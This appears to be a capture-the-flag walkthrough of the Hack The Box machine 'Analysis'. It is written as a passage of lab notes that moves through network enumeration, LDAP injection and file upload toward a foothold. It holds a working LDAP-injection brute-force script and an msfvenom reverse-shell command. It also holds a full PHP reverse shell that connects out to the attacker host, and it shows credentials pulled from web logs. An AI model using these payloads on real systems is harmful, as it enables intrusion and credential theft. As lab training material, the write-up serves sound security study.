HTB | Analysis
Machine - https://app.hackthebox.com/machines/Analysis
IP - 10.10.11.250
NMAP
└─$ nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,3306,5985,9389,33060,47001,49664,49665,49666,49667,49672,49674,49675,49678,49679,49696,49709 10.10.11.250 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-09 16:29 IST
Nmap scan report for 10.10.11.250
Host is up (0.48s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-09 11:00:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3306/tcp open mysql MySQL (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
33060/tcp open mysqlx MySQL X protocol listener
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49709/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 5s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-08-09T11:01:19
|_ start_date: N/A
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 108.36 secondsLDAP
└─$ ldapsearch -H ldap://10.10.11.250 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=analysis,DC=htb
namingcontexts: CN=Configuration,DC=analysis,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=analysis,DC=htb
namingcontexts: DC=DomainDnsZones,DC=analysis,DC=htb
namingcontexts: DC=ForestDnsZones,DC=analysis,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1Port 80
└─$ whatweb -v -a 3 <http://analysis.htb/>
WhatWeb report for <http://analysis.htb/>
Status : 200 OK
Title : <None>
IP : 10.10.11.250
Country : RESERVED, ZZ
Summary : Email[mail@demolink.org,privacy@demolink.org], HTTPServer[Microsoft-IIS/10.0], JQuery, Microsoft-IIS[10.0], Script[text/javascript]
Detected Plugins:
[ Email ]
Extract email addresses. Find valid email address and
syntactically invalid email addresses from mailto: link
tags. We match syntactically invalid links containing
mailto: to catch anti-spam email addresses, eg. bob at
gmail.com. This uses the simplified email regular
expression from
<http://www.regular-expressions.info/email.html> for valid
email address matching.
String : mail@demolink.org,privacy@demolink.org
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : Microsoft-IIS/10.0 (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Website : <http://jquery.com/>
[ Microsoft-IIS ]
Microsoft Internet Information Services (IIS) for Windows
Server is a flexible, secure and easy-to-manage Web server
for hosting anything on the Web. From media streaming to
web application hosting, IIS's scalable and open
architecture is ready to handle the most demanding tasks.
Version : 10.0
Website : <http://www.iis.net/>
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
String : text/javascript
HTTP Headers:
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 08 Jul 2023 09:20:59 GMT
Accept-Ranges: bytes
ETag: "ddc152827db1d91:0"
Server: Microsoft-IIS/10.0
Date: Sat, 09 Aug 2025 11:09:08 GMT
Connection: close
Content-Length: 17830Let’s do directory and subdomain enumeration
└─$ dirsearch -u <http://analysis.htb/> -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/anurag/htb/Analysis/reports/http_analysis.htb/__25-08-09_16-39-57.txt
Target: <http://analysis.htb/>
[16:39:57] Starting:
[16:40:07] 301 - 158B - /js -> <http://analysis.htb/js/>
[16:41:15] 301 - 159B - /css -> <http://analysis.htb/css/>
[16:41:34] 301 - 162B - /images -> <http://analysis.htb/images/>
Task Completed subdomin
└─$ wfuzz -c -u <http://analysis.htb> -H "Host: FUZZ.analysis.htb" -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt --hc 302,400,301,404
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: <http://analysis.htb/>
Total requests: 484699
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000002911: 403 29 L 95 W 1268 Ch "internal" Let’s add this subdomain to our /etc/hosts file
Since it is 403, meaning there must be something which might be accessible on this subdomain
└─$ feroxbuster -u <http://internal.analysis.htb> -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -x php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \\ \\_/ | | \\ |__
| |___ | \\ | \\ | \\__, \\__/ / \\ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ <http://internal.analysis.htb>
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 91w 1273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 29l 93w 1284c <http://internal.analysis.htb/>
301 GET 2l 10w 170c <http://internal.analysis.htb/users> => <http://internal.analysis.htb/users/>
200 GET 1l 2w 17c <http://internal.analysis.htb/users/list.php>
301 GET 2l 10w 174c <http://internal.analysis.htb/dashboard> => <http://internal.analysis.htb/dashboard/>
301 GET 2l 10w 177c <http://internal.analysis.htb/dashboard/js> => <http://internal.analysis.htb/dashboard/js/>
301 GET 2l 10w 178c <http://internal.analysis.htb/dashboard/css> => <http://internal.analysis.htb/dashboard/css/>
301 GET 2l 10w 178c <http://internal.analysis.htb/dashboard/img> => <http://internal.analysis.htb/dashboard/img/>
302 GET 0l 0w 3c <http://internal.analysis.htb/dashboard/logout.php> => ../employees/login.php
301 GET 2l 10w 178c <http://internal.analysis.htb/dashboard/lib> => <http://internal.analysis.htb/dashboard/lib/>
301 GET 2l 10w 182c <http://internal.analysis.htb/dashboard/uploads> => <http://internal.analysis.htb/dashboard/uploads/>
200 GET 0l 0w 0c <http://internal.analysis.htb/dashboard/upload.php>
200 GET 4l 4w 38c <http://internal.analysis.htb/dashboard/index.php>
200 GET 4l 4w 35c <http://internal.analysis.htb/dashboard/form.php>
301 GET 2l 10w 174c <http://internal.analysis.htb/employees> => <http://internal.analysis.htb/employees/>
200 GET 30l 60w 1085c <http://internal.analysis.htb/employees/login.php>
200 GET 4l 4w 35c <http://internal.analysis.htb/dashboard/tickets.php>
200 GET 4l 4w 35c <http://internal.analysis.htb/dashboard/details.php>
200 GET 4l 4w 35c <http://internal.analysis.htb/dashboard/emergency.php>
301 GET 2l 10w 184c <http://internal.analysis.htb/dashboard/lib/chart> => <http://internal.analysis.htb/dashboard/lib/chart/>
404 GET 0l 0w 1259c <http://internal.analysis.htb/dashboard/css/fred>
400 GET 6l 26w 324c <http://internal.analysis.htb/error%1F_log>
400 GET 6l 26w 324c <http://internal.analysis.htb/error%1F_log.php>
400 GET 6l 26w 324c <http://internal.analysis.htb/users/error%1F_log>
400 GET 6l 26w 324c <http://internal.analysis.htb/users/error%1F_log.php>
400 GET 6l 26w 324c <http://internal.analysis.htb/dashboard/error%1F_log>
400 GET 6l 26w 324c <http://internal.analysis.htb/dashboard/error%1F_log.php>
400 GET 6l 26w 324c <http://internal.analysis.htb/dashboard/js/error%1F_log>
400 GET 6l 26w 324c <http://internal.analysis.htb/dashboard/css/error%1F_log>
400 GET 6l 26w 324c <http://internal.analysis.htb/dashboard/js/error%1F_log.php>
400 GET 6l 26w 324c <http://internal.analysis.htb/dashboard/css/error%1F_log.php>
400 GET 6l 26w 324c <http://internal.analysis.htb/dashboard/img/error%1F_log>
400 GET 6l 26w 324c <http://internal.analysis.htb/dashboard/uploads/error%1F_log>
400 GET 6l 26w 324c <http://internal.analysis.htb/dashboard/img/error%1F_log.php>
400 GET 6l 26w 324c <http://internal.analysis.htb/dashboard/lib/error%1F_log>
400 GET 6l 26w 324c <http://internal.analysis.htb/dashboard/uploads/error%1F_log.php>
400 GET 6l 26w 324c <http://internal.analysis.htb/dashboard/lib/error%1F_log.php>
400 GET 6l 26w 324c <http://internal.analysis.htb/employees/error%1F_log>
400 GET 6l 26w 324c <http://internal.analysis.htb/employees/error%1F_log.php>
400 GET 6l 26w 324c <http://internal.analysis.htb/dashboard/lib/chart/error%1F_log>
400 GET 6l 26w 324c <http://internal.analysis.htb/dashboard/lib/chart/error%1F_log.php>
[####################] - 7m 265873/265873 0s found:40 errors:0
[####################] - 6m 26584/26584 75/s <http://internal.analysis.htb/>
[####################] - 6m 26584/26584 75/s <http://internal.analysis.htb/users/>
[####################] - 6m 26584/26584 75/s <http://internal.analysis.htb/dashboard/>
[####################] - 6m 26584/26584 75/s <http://internal.analysis.htb/dashboard/js/>
[####################] - 6m 26584/26584 75/s <http://internal.analysis.htb/dashboard/css/>
[####################] - 6m 26584/26584 75/s <http://internal.analysis.htb/dashboard/img/>
[####################] - 6m 26584/26584 75/s <http://internal.analysis.htb/dashboard/lib/>
[####################] - 6m 26584/26584 75/s <http://internal.analysis.htb/dashboard/uploads/>
[####################] - 6m 26584/26584 75/s <http://internal.analysis.htb/employees/>
[####################] - 6m 26584/26584 76/s <http://internal.analysis.htb/dashboard/lib/chart/> There’s a bunch of potentially interesting paths in there, and I’ll specifically want to check out the ones that returned 200:
/users/list.php/dashboard/upload.php/dashboard/index.php/dashboard/form.php/dashboard/tickets.php/dashboard/details.php/dashboard/emergency.php/employees/login.php
All of the dashboard paths return an empty page.
/employees/login.php presents a login form:
/users/list.php returns a message:
Let’s fuzz for parameter
└─$ ffuf -u '<http://internal.analysis.htb/users/list.php?FUZZ=>' -w /usr/share/wordlists/seclists/Discovery/Web-Content/api/api-endpoints-res.txt -fs 17
/'___\\ /'___\\ /'___\\
/\\ \\__/ /\\ \\__/ __ __ /\\ \\__/
\\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\
\\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/
\\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\
\\/_/ \\/_/ \\/___/ \\/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : <http://internal.analysis.htb/users/list.php?FUZZ=>
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/api/api-endpoints-res.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 17
________________________________________________
name [Status: 200, Size: 406, Words: 11, Lines: 1, Duration: 520ms]
:: Progress: [12334/12334] :: Job [1/1] :: 99 req/sec :: Duration: [0:01:46] :: Errors: 0 ::
Foothold/shell
Shell as jdoe
LDAP Injection
When passing a name parameter with * it gives some output
When passing a* it gives
It looks like * is being used as a wildcard.
It’s also worth noting that the column headers in the table line up very nicely with standard LDAP fields.
it looks like LDAP injection
LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorized, or subvert the application's logic to perform some unauthorized action.
I will take the help of 0xBen’s script and modify it a little
Let’s start with technician
└─$ cat test.py
#!/usr/bin/env python3
import urllib.parse
import requests
import string
# Characters to test
alphanumeric_chars = string.ascii_letters + string.digits + "!@#$%^&()-_=+.;:',<.>/?\\\\|[{]}"
# No proxy
proxies = {}
headers = {
'User-Agent': 'Mozilla/5.0',
}
ldap_contents = ''
try_with_asterisk = False
ldap_object_type = 'user'
ldap_field = 'description'
base_url = f'<http://internal.analysis.htb/users/list.php?name=*>)(%26(objectClass={ldap_object_type})({ldap_field}='
for i in range(1, 100):
found_char = False
for char in alphanumeric_chars:
if try_with_asterisk:
encoded_char = urllib.parse.quote(ldap_contents + '*' + char, safe="")
else:
encoded_char = urllib.parse.quote(ldap_contents + char, safe="")
url = f'{base_url}{encoded_char}*)'
response = requests.get(url, headers=headers, proxies=proxies)
# Detection logic — adjust as needed
if 'technician' in response.text:
ldap_contents += ('*' + char) if try_with_asterisk else char
try_with_asterisk = False
found_char = True
break
if not found_char:
if not try_with_asterisk:
try_with_asterisk = True
else:
break
if not try_with_asterisk:
print(f'LDAP contents of {ldap_field} field so far: {ldap_contents}')
if ldap_contents:
print(f'Final output of LDAP {ldap_field}: {ldap_contents}')
else:
print(f'Nothing found in LDAP field: {ldap_field}')output
└─$ python3 test.py
LDAP contents of description field so far: 9
LDAP contents of description field so far: 97
LDAP contents of description field so far: 97N
LDAP contents of description field so far: 97NT
LDAP contents of description field so far: 97NTt
LDAP contents of description field so far: 97NTtl
LDAP contents of description field so far: 97NTtl*4
LDAP contents of description field so far: 97NTtl*4Q
LDAP contents of description field so far: 97NTtl*4QP
LDAP contents of description field so far: 97NTtl*4QP9
LDAP contents of description field so far: 97NTtl*4QP96
LDAP contents of description field so far: 97NTtl*4QP96B
LDAP contents of description field so far: 97NTtl*4QP96Bv
Final output of LDAP description: 97NTtl*4QP96Bvlogin via the technician via portal
I can login to the employee portal
PHP file upload and shell as svc_web
We can upload a report for the SOC team to analyse
When uploading an exe, it says file is safe, but we didn’t get any call back
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=1234 -f exe -o revshell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: revshell.exe
On looking at Burp, we found that it is saving the file to uploads directory
I used revshells.com for shell.php
<?php
// Copyright (c) 2020 Ivan Sincek
// v2.3
// Requires PHP v5.0.0 or greater.
// Works on Linux OS, macOS, and Windows OS.
// See the original script at <https://github.com/pentestmonkey/php-reverse-shell>.
class Shell {
private $addr = null;
private $port = null;
private $os = null;
private $shell = null;
private $descriptorspec = array(
0 => array('pipe', 'r'), // shell can read from STDIN
1 => array('pipe', 'w'), // shell can write to STDOUT
2 => array('pipe', 'w') // shell can write to STDERR
);
private $buffer = 1024; // read/write buffer size
private $clen = 0; // command length
private $error = false; // stream read/write error
public function __construct($addr, $port) {
$this->addr = $addr;
$this->port = $port;
}
private function detect() {
$detected = true;
if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS
$this->os = 'LINUX';
$this->shell = '/bin/bash';
} else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
$this->os = 'WINDOWS';
$this->shell = 'cmd.exe';
} else {
$detected = false;
echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\\n";
}
return $detected;
}
private function daemonize() {
$exit = false;
if (!function_exists('pcntl_fork')) {
echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\\n";
} else if (($pid = @pcntl_fork()) < 0) {
echo "DAEMONIZE: Cannot fork off the parent process, moving on...\\n";
} else if ($pid > 0) {
$exit = true;
echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\\n";
} else if (posix_setsid() < 0) {
// once daemonized you will actually no longer see the script's dump
echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\\n";
} else {
echo "DAEMONIZE: Completed successfully!\\n";
}
return $exit;
}
private function settings() {
@error_reporting(0);
@set_time_limit(0); // do not impose the script execution time limit
@umask(0); // set the file/directory permissions - 666 for files and 777 for directories
}
private function dump($data) {
$data = str_replace('<', '<', $data);
$data = str_replace('>', '>', $data);
echo $data;
}
private function read($stream, $name, $buffer) {
if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream
$this->error = true; // set global error flag
echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\\n";
}
return $data;
}
private function write($stream, $name, $data) {
if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream
$this->error = true; // set global error flag
echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\\n";
}
return $bytes;
}
// read/write method for non-blocking streams
private function rw($input, $output, $iname, $oname) {
while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length
$this->dump($data); // script's dump
}
}
// read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
// we must read the exact byte length from a stream and not a single byte more
private function brw($input, $output, $iname, $oname) {
$fstat = fstat($input);
$size = $fstat['size'];
if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) {
// for some reason Windows OS pipes STDIN into STDOUT
// we do not like that
// we need to discard the data from the stream
while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
$this->clen -= $bytes;
$size -= $bytes;
}
}
while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
$size -= $bytes;
$this->dump($data); // script's dump
}
}
public function run() {
if ($this->detect() && !$this->daemonize()) {
$this->settings();
// ----- SOCKET BEGIN -----
$socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
if (!$socket) {
echo "SOC_ERROR: {$errno}: {$errstr}\\n";
} else {
stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS
// ----- SHELL BEGIN -----
$process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);
if (!$process) {
echo "PROC_ERROR: Cannot start the shell\\n";
} else {
foreach ($pipes as $pipe) {
stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS
}
// ----- WORK BEGIN -----
$status = proc_get_status($process);
@fwrite($socket, "SOCKET: Shell has connected! PID: " . $status['pid'] . "\\n");
do {
$status = proc_get_status($process);
if (feof($socket)) { // check for end-of-file on SOCKET
echo "SOC_ERROR: Shell connection has been terminated\\n"; break;
} else if (feof($pipes[1]) || !$status['running']) { // check for end-of-file on STDOUT or if process is still running
echo "PROC_ERROR: Shell process has been terminated\\n"; break; // feof() does not work with blocking streams
} // use proc_get_status() instead
$streams = array(
'read' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR
'write' => null,
'except' => null
);
$num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], 0); // wait for stream changes | will not wait on Windows OS
if ($num_changed_streams === false) {
echo "STRM_ERROR: stream_select() failed\\n"; break;
} else if ($num_changed_streams > 0) {
if ($this->os === 'LINUX') {
if (in_array($socket , $streams['read'])) { $this->rw($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
} else if ($this->os === 'WINDOWS') {
// order is important
if (in_array($socket, $streams['read'])/*------*/) { $this->rw ($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
if (($fstat = fstat($pipes[2])) && $fstat['size']) { $this->brw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
if (($fstat = fstat($pipes[1])) && $fstat['size']) { $this->brw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
}
}
} while (!$this->error);
// ------ WORK END ------
foreach ($pipes as $pipe) {
fclose($pipe);
}
proc_close($process);
}
// ------ SHELL END ------
fclose($socket);
}
// ------ SOCKET END ------
}
}
}
echo '<pre>';
// change the host address and/or port number as necessary
$sh = new Shell('10.10.16.7', 1234);
$sh->run();
unset($sh);
// garbage collector requires PHP v5.3.0 or greater
// @gc_collect_cycles();
echo '</pre>';
?>Upload this and load http://internal.analysis.htb/dashboard/uploads/shell.php and we get the call back on our listner
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.250] 56300
SOCKET: Shell has connected! PID: 9824
Microsoft Windows [version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. Tous droits r�serv�s.
C:\\inetpub\\internal\\dashboard\\uploads>whoami
analysis\\svc_web
C:\\inetpub\\internal\\dashboard\\uploads>enum log files
We found 2 dir in LogFile
R�pertoire de C:\\inetpub\\logs\\LogFiles
13/05/2023 10:23 <DIR> .
13/05/2023 10:23 <DIR> ..
09/08/2025 13:08 <DIR> W3SVC1
10/01/2024 13:30 <DIR> W3SVC2 R�pertoire de C:\\inetpub\\logs\\LogFiles\\W3SVC1
09/08/2025 13:08 <DIR> .
09/08/2025 13:08 <DIR> ..
10/01/2024 13:30 263 u_ex240108.log
09/08/2025 13:17 4�611�190 u_ex250809.log
2 fichier(s) 4�611�453 octets
2 R�p(s) 4�020�133�888 octets libres
C:\\inetpub\\logs\\LogFiles>dir W3SVC2
Le volume dans le lecteur C n'a pas de nom.
Le num�ro de s�rie du volume est 0071-E237
R�pertoire de C:\\inetpub\\logs\\LogFiles\\W3SVC2
10/01/2024 13:30 <DIR> .
10/01/2024 13:30 <DIR> ..
09/08/2025 16:53 56�071�020 u_ncsa1.log
1 fichier(s) 56�071�020 octets
2 R�p(s) 4�020�133�888 octets libres
C:\\inetpub\\logs\\LogFiles> on looking for username and password, we fond multiple alerts for jdoe
C:\\inetpub\\logs\\LogFiles\\W3SVC2>findstr username u_ncsa1.log
127.0.0.1 - - [09/Aug/2025:13:00:24 +0200] "GET /dashboard/alert_panel.php?auth=1&username=jdoe&password=7y4Z4%5E*y9Zzj&alert=c2_malware_detected HTTP/1.1" 200 8924
127.0.0.1 - - [09/Aug/2025:13:02:23 +0200] "GET /dashboard/alert_panel.php?auth=1&username=jdoe&password=7y4Z4%5E*y9Zzj&alert=c2_malware_detected HTTP/1.1" 200 8924
10.10.16.7 - - [09/Aug/2025:13:21:43 +0200] "GET /usernames.txt HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:28:29 +0200] "GET /users/usernames.txt HTTP/1.1" 404 1416
10.10.16.7 - - [09/Aug/2025:13:31:35 +0200] "GET /users/space-username HTTP/1.1" 404 1416
10.10.16.7 - - [09/Aug/2025:13:36:17 +0200] "GET /users/username HTTP/1.1" 404 1416
10.10.16.7 - - [09/Aug/2025:13:37:47 +0200] "GET /space-username HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:37:47 +0200] "GET /space-username.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:37:50 +0200] "GET /users/space-username HTTP/1.1" 404 1416
10.10.16.7 - - [09/Aug/2025:13:37:50 +0200] "GET /users/space-username.php HTTP/1.1" 404 1416
10.10.16.7 - - [09/Aug/2025:13:37:59 +0200] "GET /dashboard/space-username HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:37:59 +0200] "GET /dashboard/space-username.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:38:00 +0200] "GET /dashboard/js/space-username HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:38:00 +0200] "GET /dashboard/css/space-username HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:38:00 +0200] "GET /dashboard/img/space-username HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:38:00 +0200] "GET /dashboard/js/space-username.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:38:00 +0200] "GET /dashboard/css/space-username.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:38:00 +0200] "GET /dashboard/img/space-username.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:38:01 +0200] "GET /dashboard/uploads/space-username HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:38:01 +0200] "GET /dashboard/lib/space-username HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:38:01 +0200] "GET /dashboard/lib/space-username.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:38:01 +0200] "GET /dashboard/uploads/space-username.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:38:07 +0200] "GET /employees/space-username HTTP/1.1" 404 1416
10.10.16.7 - - [09/Aug/2025:13:38:07 +0200] "GET /employees/space-username.php HTTP/1.1" 404 1416
10.10.16.7 - - [09/Aug/2025:13:38:29 +0200] "GET /dashboard/lib/chart/space-username HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:38:29 +0200] "GET /dashboard/lib/chart/space-username.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:40:08 +0200] "GET /username HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:40:08 +0200] "GET /username.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:40:11 +0200] "GET /users/username HTTP/1.1" 404 1416
10.10.16.7 - - [09/Aug/2025:13:40:11 +0200] "GET /users/username.php HTTP/1.1" 404 1416
10.10.16.7 - - [09/Aug/2025:13:40:20 +0200] "GET /dashboard/username HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:40:20 +0200] "GET /dashboard/username.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:40:21 +0200] "GET /dashboard/css/username HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:40:21 +0200] "GET /dashboard/js/username HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:40:21 +0200] "GET /dashboard/css/username.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:40:21 +0200] "GET /dashboard/js/username.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:40:21 +0200] "GET /dashboard/img/username HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:40:21 +0200] "GET /dashboard/uploads/username HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:40:22 +0200] "GET /dashboard/lib/username HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:40:22 +0200] "GET /dashboard/img/username.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:40:22 +0200] "GET /dashboard/uploads/username.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:40:22 +0200] "GET /dashboard/lib/username.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:40:28 +0200] "GET /employees/username HTTP/1.1" 404 1416
10.10.16.7 - - [09/Aug/2025:13:40:29 +0200] "GET /employees/username.php HTTP/1.1" 404 1416
10.10.16.7 - - [09/Aug/2025:13:40:48 +0200] "GET /dashboard/lib/chart/username HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:40:49 +0200] "GET /dashboard/lib/chart/username.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:41:41 +0200] "GET /users/username_check HTTP/1.1" 404 1416
10.10.16.7 - - [09/Aug/2025:13:42:39 +0200] "GET /username_check HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:42:39 +0200] "GET /username_check.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:42:42 +0200] "GET /users/username_check HTTP/1.1" 404 1416
